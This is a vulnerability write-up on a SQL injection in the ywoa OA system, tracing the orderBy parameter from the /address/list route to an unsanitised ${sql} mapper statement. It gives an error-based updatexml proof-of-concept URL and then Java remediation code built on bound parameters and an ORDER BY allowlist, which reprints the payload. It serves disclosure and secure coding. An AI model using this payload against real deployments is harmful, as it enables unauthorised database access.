  1. A global search for ${ shows that ${sql} is used at com/cloudweb/oa/mapper/xml/AddressDao.xml:123 to concatenate the SQL query, so if the sql variable is controllable there is a SQL injection vulnerability.
  2. Following up, the selectList() method is declared at com/cloudweb/oa/dao/AddressDao.java:30.
  3. One level up, selectList() is called at com/cloudweb/oa/service/AddressService.java:132, inside listResult(). Next we look for where listResult() is called.
  4. One level up again, listResult() is called at com/cloudweb/oa/controller/AddressController.java:362, and the sql variable is controllable.
  5. As the screenshot shows, the sql variable is produced by getSql(). Following getSql(), the orderBy parameter is spliced directly into the sql variable without any filtering at com/cloudweb/oa/service/AddressService.java:226, so controlling the orderBy parameter triggers the SQL injection.
  6. Finally, back in the controller layer, com/cloudweb/oa/controller/AddressController.java:351 shows that the orderBy parameter reaches the backend code through the /address/list route.
  7. PoC; you must be logged into the backend to trigger the SQL injection:
http://localhost:8096/oa/address/list?orderBy=1/**/desc)/**/tmp_count/**/where/**/1=1/**/and/**/updatexml/**/(1,concat(0x7e,user(),0x7e),1)--+-
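
Every report above, from /notice/list?what through /address/list?orderBy, ends at a mapper statement that executes ${sql} built from request parameters. The block below is an added example of the query-building discipline that closes all of them at once; it is not ywoa's code, and the table, column names and package are illustrative. Search terms (what, cond) and flags (isValid) travel as bound parameters; ORDER BY identifiers (orderBy, sort), which cannot be bound, are looked up in a fixed allowlist keyed by the request value, so the request value itself never reaches the SQL text. The vulnerable shape is kept beside it for contrast. Java 11+ is assumed.

```java
package example.query;  // hypothetical package, not part of ywoa

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Set;

/** Added example: list query built without splicing request parameters into SQL text. */
public final class SafeListQuery {

    /** SQL text with '?' placeholders plus the values to bind, in order. */
    public static final class Query {
        public final String sql;
        public final List<Object> params;

        Query(String sql, List<Object> params) {
            this.sql = sql;
            this.params = Collections.unmodifiableList(params);
        }
    }

    // ORDER BY cannot be parameterised, so the request value is only ever a key into
    // this map; the SQL identifier comes from the map, never from the request.
    // Column names are illustrative, not ywoa's schema.
    private static final Map<String, String> ORDER_COLUMNS = Map.of(
            "id", "n.id",
            "title", "n.title",
            "addDate", "n.add_date");
    private static final Set<String> DIRECTIONS = Set.of("asc", "desc");

    /** The vulnerable shape from the reports, kept only for contrast. */
    public static String vulnerable(String what, String orderBy, String sort) {
        return "select * from oa_notice n where n.title like '%" + what + "%'"
                + " order by " + orderBy + " " + sort;
    }

    /** Hardened shape: values are bound, identifiers are looked up, everything else rejected. */
    public static Query hardened(String what, Boolean isValid, String orderBy, String sort) {
        String column = ORDER_COLUMNS.get(orderBy == null ? "id" : orderBy);
        if (column == null) {
            throw new IllegalArgumentException("orderBy not in allowlist: " + orderBy);
        }
        String direction = sort == null ? "desc" : sort.toLowerCase();
        if (!DIRECTIONS.contains(direction)) {
            throw new IllegalArgumentException("sort must be asc or desc: " + sort);
        }
        List<Object> params = new ArrayList<>();
        StringBuilder sql = new StringBuilder("select * from oa_notice n where 1 = 1");
        if (what != null && !what.isEmpty()) {
            // The search term is a bound value (MyBatis: #{what}); LIKE metacharacters are
            // escaped so a user cannot widen the pattern, but nothing here is SQL syntax.
            sql.append(" and n.title like ? escape '!'");
            params.add("%" + escapeLike(what) + "%");
        }
        if (isValid != null) {
            // Flags are typed and bound, never passed through as SQL fragments.
            sql.append(" and n.is_valid = ?");
            params.add(isValid ? 1 : 0);
        }
        // Only the allowlisted identifier and direction are ever concatenated
        // (MyBatis: ${orderColumn} is acceptable here precisely because it is not user text).
        sql.append(" order by ").append(column).append(' ').append(direction);
        return new Query(sql.toString(), params);
    }

    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    public static void main(String[] args) {
        String payload = "1 desc) tmp_count where 1=1 and updatexml(1,concat(0x7e,user(),0x7e),1)-- -";
        System.out.println(vulnerable("a", payload, "desc"));
        try {
            hardened("a", true, payload, "desc");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        Query q = hardened("'and updatexml(1,1,1)-- -", true, "addDate", "DESC");
        System.out.println(q.sql + "   params=" + q.params);
    }
}
```

The returned Query maps directly onto a JDBC PreparedStatement (set each params entry in order) or onto a MyBatis statement in which only the allowlisted column string is passed through ${} and every value goes through #{}. Rejecting unknown orderBy and sort values with an exception rather than silently falling back to a default also gives the application a clean signal to log, which is how the updatexml probes in these reports would show up in monitoring.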
